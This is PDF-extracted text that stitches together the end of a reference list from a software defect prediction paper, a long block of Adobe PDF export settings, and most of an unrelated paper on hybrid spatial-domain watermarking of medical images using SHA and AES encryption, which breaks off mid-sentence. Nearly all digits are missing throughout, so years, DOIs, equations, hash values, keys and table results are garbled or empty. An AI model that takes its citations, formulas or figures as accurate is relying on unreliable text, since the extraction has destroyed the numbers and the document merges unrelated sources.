. class imbalance problem in data mining: review. international journal of computer science and network ( ): – . ma b, dejaeger k, vanthienen j, baesens b. . software defect prediction based on association rule classification. in: proceedings of st international conference on e-business intelligence (icebi’ ). paris: atlantis press. mccabe tj. . a complexity measure. ieee transactions on software engineering ( ): – . niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /icse. . http://dx.doi.org/ . /s - - - https://www.cqse.eu/en/blog/mccabe-cyclomatic-complexity/ http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mccallum a, nigam k. . a comparison of event models for naive bayes text classification. in: proceedings of workshop on learning for text categorization (aaai- -w ). palo alto, california: aaai press, vol. , – . mende t, koschke r. . revisiting the evaluation of defect prediction models. in: proceedings of th international conference on predictor models in software engineering (promise’ ). new york: acm, . meneely a, williams l, snipes w, osborne j. . predicting failures with developer networks and social network analysis. in: proceedings of th international symposium on foundations of software engineering (fse’ ). new york: acm, – . menzies t, di stefano js. . how good is your blind spot sampling policy? in: proceedings of th international symposium on high assurance systems engineering. piscataway: ieee, – . menzies t, di stefano js, chapman m, mcgill k. . metrics that matter. in: proceedings of th annual nasa goddard software engineering workshop. piscataway: ieee, ieee/nasa, – . menzies t, di stefano j, orrego a, chapman r. . assessing predictors of software defects. in: proceedings of workshop predictive software models (psm’ ). menzies t, greenwald j, frank a. . data mining static code attributes to learn defect predictors. ieee transactions on software engineering ( ): – doi . /tse. . . menzies t, milton z, turhan b, cukic b, jiang y, bener a. . defect prediction from static code features: current results, limitations, new approaches. automated software engineering ( ): – doi . /s - - - . menzies t, stefano j, ammar k, mcgill k, callis p, davis j, chapman r. . when can we test less? in: proceedings of th international symposium on software metrics (sms’ ). piscataway: ieee, – . morisaki s, monden a, matsumura t, tamada h, matsumoto k-i. . defect data analysis based on extended association rule mining. in: proceedings of th international workshop on mining software repositories (msr’ ). los alamitos: ieee computer society. nagappan n, ball t. . use of relative code churn measures to predict system defect density. in: proceedings of th international conference on software engineering (icse’ ). piscataway: ieee, – . nagappan n, ball t, zeller a. . mining metrics to predict component failures. in: proceedings of th international conference on software engineering (icse’ ). new york: acm, – . ndepend. . code metrics definitions. available at http://www.ndepend.com/docs/code- metrics#ilnestingdepth (accessed august ). niedermayr r, röhm t, wagner s. . dataset: too trivial to test? available at https://figshare.com/articles/dataset_too_trivial_to_test_/ . ostrand tj, weyuker ej, bell rm. . where the bugs are. acm sigsoft software engineering notes. vol. . new york: acm, – . ostrand tj, weyuker ej, bell rm. . predicting the location and number of faults in large software systems. ieee transactions on software engineering ( ): – doi . /tse. . . palomba f, zanoni m, fontana fa, de lucia a, oliveto r. . smells like teen spirit: improving bug prediction performance using the intensity of code smells. in: proceedings. nd international conference on software maintenance and evolution (icsme’ ). piscataway: ieee, – . niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /s - - - http://www.ndepend.com/docs/code-metrics#ilnestingdepth http://www.ndepend.com/docs/code-metrics#ilnestingdepth https://figshare.com/articles/dataset_too_trivial_to_test_/ http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ pascarella l, palomba f, bacchelli a. . re-evaluating method-level bug prediction. in: proceedings of th international conference on software analysis, evolution and reengineering (saner’ ). piscataway: ieee, – . r core team. . r: a language and environment for statistical computing. version . . . vienna: r foundation for statistical computing. available at https://www.r-project.org/. rahman f, devanbu p. . ownership, experience and effects: a fine-grained study of authorship. in: proceedings of rd international conference on software engineering (icse’ ). new york: acm, – . scanniello g, gravino c, marcus a, menzies t. . class level fault prediction using software clustering. in: proceedings of th international conference on automated software engineering (ase’ ). piscataway: ieee, – . shepperd m. . a critique of cyclomatic complexity as a software metric. software engineering journal ( ): – doi . /sej. . . shippey t, hall t, counsell s, bowes d. . so you need more method level datasets for your software defect prediction? voilà! in: proceedings of th international symposium on empirical software engineering and measurement (esem’ ). new york: acm. shivaji s, whitehead ej, akella r, kim s. . reducing features to improve code change-based bug prediction. ieee transactions on software engineering ( ): – doi . /tse. . . simon gj, kumar v, li pw. . a simple statistical model and association rule filtering for classification. in: proceedings of th international conference on knowledge discovery and data mining (sigkdd’ ). new york: acm, – . song q, shepperd m, cartwright m, mair c. . software defect association mining and defect correction effort prediction. ieee transactions on software engineering ( ): – doi . /tse. . . torgo l. . data mining with r, learning with case studies. boca raton: crc press. turhan b, menzies t, bener ab, di stefano j. . on the relative value of cross-company and within-company data for defect prediction. empirical software engineering ( ): – doi . /s - - - . weyuker ej, ostrand tj. . what can fault prediction do for you? in: proceedings of nd international conference on tests and proofs (tap’ ). new york: springer, – . witten ih, frank e, hall ma, pal cj. . data mining: practical machine learning tools and techniques. san francisco: morgan kaufmann. xia x, lo d, pan sj, nagappan n, wang x. . hydra: massively compositional model for cross-project defect prediction. ieee transactions on software engineering ( ): – doi . /tse. . . xu z, liu j, luo x, zhang t. . cross-version defect prediction via hybrid active learning with kernel principal component analysis. in: proceedings of th international conference on software analysis, evolution and reengineering (saner’ ). piscataway: ieee, – . zafar h, rana z, shamail s, awais mm. . finding focused itemsets from software defect data. in: proceedings of th international multitopic conference (inmic’ ). piscataway: ieee, – . zhang h, zhang x, gu m. . predicting defective software components from code complexity measures. in: proceedings of th pacific rim international symposium on dependable computing (prdc’ ). piscataway: ieee, – . niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.r-project.org/ http://dx.doi.org/ . /sej. . http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ zhang f, zheng q, zou y, hassan ae. . cross-project defect prediction using a connectivity- based unsupervised classifier. in: proceedings of th international conference on software engineering (icse’ ). new york: acm, – . zimmermann t, nagappan n. . predicting defects using network analysis on dependency graphs. in: proceedings of th international conference on software engineering (icse’ ). piscataway: ieee, – . zimmermann t, nagappan n, gall h, giger e, murphy b. . cross-project defect prediction: a large scale experiment on data vs. domain vs. process. in: proceedings of th joint meeting of the european software engineering conference and the symposium on the foundations of software engineering (esec/fse’ ). new york: acm, – . zimmermann t, premraj r, zeller a. . predicting defects for eclipse. in: proceedings of rd international workshop on predictor models in software engineering (promise’ ). washington, d.c.: ieee computer society, . niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. too trivial to test? an inverse view on defect prediction to identify methods with low fault risk introduction association rule mining related work idp approach empirical study discussion conclusion flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice protection of the patient data against intentional attacks using a hybrid robust watermarking code protection of the patient data against intentional attacks using a hybrid robust watermarking code ahmad nagm and mohammed safy elwan computer engineering, cairo higher institute for engineering, computer science and management, cairo, egypt electrical engineering, egyptian academy of engineering and advanced technology, cairo, egypt abstract the security of patient information is important during the transfer of medical data. a hybrid spatial domain watermarking algorithm that includes encryption, integrity protection, and steganography is proposed to strengthen the information originality based on the authentication. the proposed algorithm checks whether the patient’s information has been deliberately changed or not. the created code is distributed at every pixel of the medical image and not only in the regions of non- interest pixels, while the image details are still preserved. to enhance the security of the watermarking code, sha- is used to get the initial key for the symmetric encryption algorithm. the target of this approach is to preserve the content of the image and the watermark simultaneously, this is achieved by synthesizing an encrypted watermark from one of the components of the original image and not by embedding a watermark in the image. to evaluate the proposed code the least significant bit (lsb), bit sb, and bit sb were used. the evaluation of the proposed code showed that the lsb is of better quality but overall the bit sb is better in its ability against the active attacks up to a size of * pixels, and it preserves the high image quality. subjects computer vision, security and privacy keywords data payload, data integrity protection, sha- , spatial domain medical image watermarking, intentional attacks, steganography introduction the presence of electronic data of patients within the current worldwide health care information systems has important benefits for patients and care practitioners, including greater patient discretion and improved clinical management. the flow of knowledge between hospitals, physicians, and others has increased by % between and . hackers are also inspired by the growth and technical developments to intrude into the servers where these confidential data are stored. there are different kinds of attacks that could be used to manipulate these intelligent medical devices. if an attacker gets hold of a smart pacemaker, for instance, he will be able to give the patient a shock that could lead to his/her death (swarna priya et al., ). how to cite this article nagm a, safy elwan m. . protection of the patient data against intentional attacks using a hybrid robust watermarking code. peerj comput. sci. :e doi . /peerj-cs. submitted october accepted january published march corresponding author mohammed safy elwan, msafy@eaeat.edu.eg academic editor mamoun alazab additional information and declarations can be found on page doi . /peerj-cs. copyright nagm and safy elwan distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:msafy@�eaeat.�edu.�eg https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ the patient’s information security and the patient’s medical data privacy are of high importance nowadays. medical information plays a significant role in the health system and its modification might result in misdiagnosis. medical patient information can be intentionally tampered with results being added or deleted. some image processing could also result in unintentional changes. for example, the loss in the patient’s information while using the compression technique. this loss occurs in telemedicine applications to minimize the amount of information to be transmitted. thus this process can induce unacceptable loss of knowledge depending on its degree which may result in a misdiagnosis. security requirements differ from application to application and the protected aspects that they underline. it will guarantee three characteristics: confidentiality, honesty, and availability (allaert & dusserre, ; armoni, ; jennett et al., ; katsikas, ). for the protection of the patient’s information, digital watermarking techniques are used. watermarking strategies can be categorized into spatial and frequency domain techniques in which the watermark is embedded. spatial watermarking has various techniques such as text mapping coding, patchwork, least significant bit, and additive watermarking, etc. compared to the transforming domain methods, the spatial domain methods are less complex but weak to various image attacks. in this article, a spatial domain watermarking technique is proposed to improve the data payload and at the same time, both authentication and data hiding are included. for the identity authentication purpose, the created code is distributed into the region of interest and regions of non-interest parts of the cover medical image. to enhance the security of the confidential patient information, sha- is used to get the initial key for the symmetric encryption before embedding it in the medical image. the main contribution of the present research is: � the proposed approach preserves the patient data using a hyped watermarking strategy, which includes encryption, integrity protection, and steganography. � the watermark is created from the image and each image has its watermark depending on one of the three components of the image and on the personal information of the patient. � its advantage over the other approaches is that the created code is distributed at every pixel of the cover medical image and not only in the regions of non-interest pixels (roni). � to enhance watermark security, the hash function is used to encrypt the watermark. � although there is a watermark in every pixel in the image, it represents / of the pixel, but it did not affect the quality of the image. � it solves the problem that exists in the spatial domain algorithms that cannot simultaneously offer protection against intentional attacks and robustness. nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ literature review to protect the medical images during transmission, watermarking is used. it is a process of embedding significant information over a patient’s medical image to provide authentication, information hiding, tamper-proof data, etc. (pan et al., ). the main factors of the watermarking process are reliability, confidentiality, and authenticity. the process of watermarking is classified into invisible and visible watermarking. for watermarking attacks (priya, santhi & swaminathan, ), invisible watermarking is a robust technique. in medical images, quality is critical because the diagnosis and treatment are the primary goals. for this reason, watermarking has several limitations in medical image authentication (rao & kumari, ). to create an efficient watermark the following criteria shall be met: (i) imperceptibility (ii) payload (iii) robustness against manipulations fig. shows the tradeoff between the watermark characteristics. in mousavi, naghsh & abu-bakar ( ), the quality requirements for patients’ pathology medical data are extremely strict, and no changes are allowed. the research in the field of medical image digital watermarking (nyeem, boles & boyd, ) is essential because any change in the transmitted patient information is forbidden and will affect the physician’s decision. digital image watermarking can be mainly done in both transform and spatial domains as illustrated in fig. . figure trade-off among the features of watermarking (rao & kumari, ). full-size doi: . /peerj-cs. /fig- figure digital watermarking techniques based on embedding domain (rao & kumari, ). full-size doi: . /peerj-cs. /fig- nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the spatial domain, the watermark is inserted within the original medical image (zhang & wang, ). many techniques are used to insert a watermark such as lsb (least significant bit) substitution technique, pixel alteration, and bit shifting, etc. the technique of the spatial domain watermarking is very easy and simple with less complexity. it is an easy task to embed watermarks into the spatial domain components of the cover images. it has been one of the basic schemes used since the beginning of digital watermarking in (pan, huang & jain, ). usually, spatial watermarking systems choose several pixels from the cover image and adjust the luminance values of the pixels chosen depending on the bits of the watermark to be embedded (pan, huang & jain, ; van schyndel, tirkel & osborne, ; tirkel et al., ). a well-known classic spatial-based watermarking method is the last-significant-bits (lsb) modification scheme (van schyndel, tirkel & osborne, ). the simplicity of implementation and the low complexity are the advantages of spatial-based watermarking schemes. on the other hand, they are not robust against common methods of attack (wolfgang & delp, ; voyatzis & pitas, ; langelaar, setyawan & lagendijk, ; hernández, perez-gonzalez & rodriguez, ). to improve the spatial domain weakness, many methods are proposed. in jennett et al. ( ), the performance of spatial-based watermarking schemes can be improved using the bose–chaudhuri–hochquenghem (bch) block codes. in huang, pan & wang ( ), a scheme with greater robustness was proposed by the authors. like the general scheme described, first of all, their scheme also selects the number of pixels considered from the cover image. then, the mean value of the neighboring pixels is determined for each pixel calculated. this mean value is used to change the selected pixel. the robustness of their system is higher, which means that this system is more acceptable for practical use. besides, the device also provides a parameter for regulating the balance between imperceptibility and robustness. therefore, users of this scheme may prefer to have better imperceptibility or better robustness. in memon & gilani ( ), the content authentication of the patient’s images (ct) is the main purpose. the image is separated into two regions one of them is the region of noninterest (roni) and the other in the region of interest (roi). the watermark is inserted in the roni, so the quality of roi has persevered. this code is very simple but it can be easily attacked. in zain & clarke ( ), the security of the ultrasound (us) images is increased based on authentication and integrity. first, a rectangular shape is used to separate the roni and the roi. then sha hash function is used to calculate the hash value of the whole image. to make the code more secure, a secret key is used to create a hash value as well as a secret key for the inserted watermark. finally, the hash value is inserted into the lsbs of roni. in wakatani ( ), data hiding is the main purpose. the digital watermarking is proposed to prevent the distortion of roi in the original data by inserting the watermarking image in the roni. the results show the high performance of the code to nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ detect the embedded watermark, simultaneously the embedded watermark can be generated only apart from the roi. in viswanathan & venkata krishna ( ), watermarking and cryptography are used in one system in a way that inserts an encrypted version of the patient’s original information. after watermarking, the corrupted details of the medical information were recovered using a reversible property. in memon et al. ( ), a robust watermark is proposed based on the combination of the identification code of the physician, patient’s information and, the lsbs of the roi, which after encryption were embedded into the roni of the patient’s original image. in nagm et al. ( ) and nagm, torky & youssef ( ), a hybrid scheme is proposed. the code is distributed over the entire image. the code used the lsb, bit sb, and msb. the main focus is to discuss the efficacy of the images and not focus on the ability to counter intentional attacks to alter the patient’s information. in alattar ( ), for color images, a reversible watermarking algorithm with very high data-hiding ability has been created. the algorithm enables the process of watermarking, which restores the exact original image, to be reversed. the algorithm obscures multiple bits in the differential expansion of neighboring pixel vectors. these findings show that at the highest signal-to-noise ratio, the spatial, quad-based algorithm allows for hiding the largest payload. in shih & wu ( ), based on the genetic algorithms the watermark is embedded around the roi of the original image. the lossless compression is used to compress the roi part and the lossy compression is used to compress the roni part. in thodi & rodríguez ( ), solve the problem of the undesirable distortion at low embedding capacities of the tian’s difference-expansion technique. to embed the location map, the histogram shifting technique is used. a new reversible watermarking algorithm is illustrated based on the combination between the different expansion and the histogram shifting. in zhao et al. ( ), the histogram theory is the core of this paper. based on the difference between the pixels the histogram is constructed. a multilevel histogram modification mechanism is used in the embedding of the data. one or two level histogram modification is employed to improve the hiding capacity. the embedding level is used to extract the data and in the stage of the image recovery. in wang, lee & chang ( ), based on the histogram-shifting a reversible data hiding approach is proposed. by changing the peak point pixel value to another pixel value in the same section, the hidden data can be inserted in the cover image. to guarantee the correct extraction of the secret data, the proposed method uses a location map. in shih & zhong ( ), the medical image is separated into roi and roni. the medical images with multiple rois preselected by experts are taken as the input, to improve the embedding ability without distorting the significant diagnostic information and keep rois lossless. the roni is embedded with the watermark. because of the image transformation being applied, the rois are confined to the rectangular shape. nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in bamal & kasana ( ), for the embedding of the watermark in the cover image the slantlet transformation along with the rs vector is used. for watermark security, md and aes are used. the watermark is embedded in all the channels of the original image. the results show an increase in the capacity of the image and at the same time maintains the visual quality of watermarked images. in savakar & ghuli ( ), a combination of blind and non-blind watermarking is used. the watermark is a binary image and embedded in the cover image using dwt. in al-afandy et al. ( ), two-hybrid techniques are used. the first one is based on discrete stationary wavelet transform (dswt) and the other one is based on the singular value decomposition (svd) in discrete wavelet transform. the results show that the yiq and the rgb color coordinate system are robust in watermarking techniques against the attacks. on the other hand, the hsv is not robust in the embedding of the digital watermark. in ahvanooey et al. ( ), to make the trace unnoticeable to the readers an invisible watermark is embedded in a cover text. also, an instance-based learning algorithm is used to mark all the words of the original text. the result shows that the proposed algorithm has a higher performance compared with the existing codes. on the other hand, the algorithm uses the traditional way of embedding watermark. to summarize the findings from the existing works, spatial watermarking has the advantage of being simple implementation and low complexity and on the other hand, it is not efficient against the attacks. all the existing algorithms rely on one strategy that is the separation of the original image into the region of interest and region of non-interest. the efficiency of the algorithms depends on their ability to recover the watermark from the image. in some algorithms, the rectangular shape of the image is a must. this work is an extension to nagm & safy ( ) but the steganography process is carried out in the spatial domain. through this work, we tried to prove the effectiveness of the proposed watermark in the face of the intentional alteration of patient data not only in the frequency domain but also in the spatial domain. proposed methodology from all the above-mentioned purposes, a hybrid spatial domain watermarking scheme is proposed that meets the requirements of the medical imaging authentication. the big difference between the proposed code and the above-mentioned researches is the distribution of the watermark. the watermark is distributed at every pixel in the image includes the region of interest and region of non-interest. although the code satisfies the payload requirements because the changes in each pixel represent / from the pixel and according to the location of the bit. another difference is the target of the algorithm is to preserve the watermark and the patient image simultaneously, unlike other algorithms, which are its most important goal is to extract the embedded watermark. the whole structure of the proposed algorithm is shown in fig. . nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure proposed approach of embedding digital watermarking into medical images. full-size doi: . /peerj-cs. /fig- nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the whole structure of the proposed algorithm is summarized below: step . read the input rgb color image i ¼ ircð Þ¼ i . . . i m .. . .. . .. . in . . . inm ( ) step . the color filter array is used to decompose the image into three components as shown in ( ). g ¼ grcð Þ¼ g . . . g m .. . .. . .. . gn . . . gnm r ¼ rrcð Þ¼ r . . . r m .. . .. . .. . rn . . . rnm b ¼ rrcð Þ¼ b . . . b m .. . .. . .. . bn . . . bnm ( ) step . the separated components are resized to be suitable for the encryption process. rm rð Þ¼ r r þ � rmod ð Þð Þð Þ ( ) if remender of numeric value for input rows ≠ else, rm rð Þ¼ r rð Þ rm cð Þ¼ r c þ � cmod ð Þð Þð Þ ( ) if remender of numeric value for input rows ≠ else, rm cð Þ¼ r cð Þ step : the blue component is selected to be the pre-modifier component. step . the red component is called the modified component and by using the dynamic keys approach, the blue component (the pre-modifier component) is encrypted. the arrival date, the name, the patient id, and any information related to the patient are combined using the dynamic keys. sha- is used to get the initial key for the symmetric encryption process. nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the initial hash values are: h ( ) =“ ”, h [ ] =“fcdab ”, h [ ] =“ badcfe”, h [ ] =“ ”, h [ ] =“c d e f ”, k ¼ sha� patient datað Þ¼ e c db fc ef adeb e d d ( ) the initial key for encryption processing is the first digits from the output the ciphered blue component of the original color image is presented by the cb and the key k = “ e c db ” with internal key and round according to ( ). cbrc ¼ aes� k½ �; bmrcð Þð Þ¼ cb . . . cb m .. . .. . .. . cbn . . . cbnm ( ) step . after the encryption is carried out, the new blue component is called the modifier component. step . to get the final modified component, a spatial domain substitution processing is carried out between the modified and modifier components. nrm ¼ nrmrc cbrcð Þ¼ nrm ... nrm m .. . .. . .. . nrmn ... nrmnm cb .. . cb m .. . .. . .. . cbn .. . cbnm ( ) step . the substitution step is carried out between one of the least significant bits, bit number # and bit number # with the same bit of ciphered blue component according to ( , , and ) to get the final modified component. nrmrcð Þ¼ b ; b ; b ; b ; b ; b ; b ; b cbð Þ½ � ( ) nrmrcð Þ¼ b ; b ; b ; b ; b ; b ; b cbð Þ; b ½ � ( ) nrmrcð Þ¼ b ; b ; b ; b ; b ; b cbð Þ; b ; b ½ � ( ) step . the original blue and green components with the final modified component are used to compose the final secured image accordingly to ( ), where ni is the protected image. nircð Þ¼ nrmrcð Þ; gmrcð Þ; bmrcð Þf g ( ) implementation and experimental results in the experiment, matlab version . . . , core i processor . ghz and gb ram is used as the test platform. nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in figs. – randomly selected medical images are used as original images images for performance evaluation, the parameters have been calculated as follows: embedding capacity although there is a watermark in every pixel in the image, it represents / of the pixel, but it did not affect the quality of the image. image distortion to assist the image distortion the mse. mae, the structural similarity index (ssim), and universal image quality index (uiqi) are used. the mean squared error (mse) is calculating by averaging the squared intensity differences of the watermarked image and the reference image pixels. the (ssim) is calculated by normalizing the mean value of structural similarity between the original image and the watermarked one. based on the combination between the luminance distortion, the contrast distortion, and the loss of correlation, the uiqi is designed by modeling any distortion of the image. mse ¼ m �n � xn j¼ x i; jð Þ� v i; jð Þ½ � ( ) mae ¼ n xn i¼ xi � vij j ( ) ssim x; vð Þ¼ � �x � �v þ c ð Þ � �sxv þ c ð Þ �x þ�v þ c ð Þ� s x þs v þ c � � ( ) q ¼ sxv sxsv � � � ��x ��v �x þ�v � � � �sx �sv s x þs v � � ( ) tables and shows that the mean absolute error and mean square error of the single lsb has the lowest value compared with the other elements. figure digital watermarking using different strategies for the ab image. (a) ab image without digital watermarks (b) ab digital watermarked by lsb (c) ab digital watermarked by bit sb (d) ab digital watermarked by bit sb. full-size doi: . /peerj-cs. /fig- nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure digital watermarking using different strategies for the ac image. (a) ac image without digital watermarks (b) ac digital watermarked by lsb (c) ac digital watermarked by bit sb (d) ac digital watermarked by bit sb. full-size doi: . /peerj-cs. /fig- figure digital watermarking using different strategies for the flu image. (a) flu image without digital watermarks (b) flu digital watermarked by lsb (c) flu digital watermarked by bit sb (d) flu digital watermarked by bit sb. full-size doi: . /peerj-cs. /fig- figure digital watermarking using different strategies for the aa image. (a) aa image without digital watermarks (b) aa digital watermarked by lsb (c) aa digital watermarked by bit sb (d) aa digital watermarked by bit sb. full-size doi: . /peerj-cs. /fig- nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table shows the structural similarity index of the single lsb and single-bit sb have the highest value compared with the single-bit sb. table shows that the proposed approach has a high entropy value for all elements. figure digital watermarking using different strategies for the thr image. (a) thr image without digital watermarks (b) thr digital watermarked by lsb (c) thr digital watermarked by bit sb (d) thr digital watermarked by bit sb. full-size doi: . /peerj-cs. /fig- figure digital watermarking using different strategies for the gastro image. (a) gastro image without digital watermarks (b) gastro digital watermarked by lsb (c) gastro digital watermarked by bit sb (d) gastro digital watermarked by bit sb. full-size doi: . /peerj-cs. /fig- table the mean absolute error of the proposed approach. images/size/jpeg mean absolute error of the proposed approach single-lsb single-bit sb single-bit sb thr/ * , . kb . . . aa/ * , . kb . . . ab/ * , kb . . . ac/ * , kb . . . flu/ * , kb . . . gastro/ * , . kb . . . nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ security of the watermark the patient id and any information related to the patient are 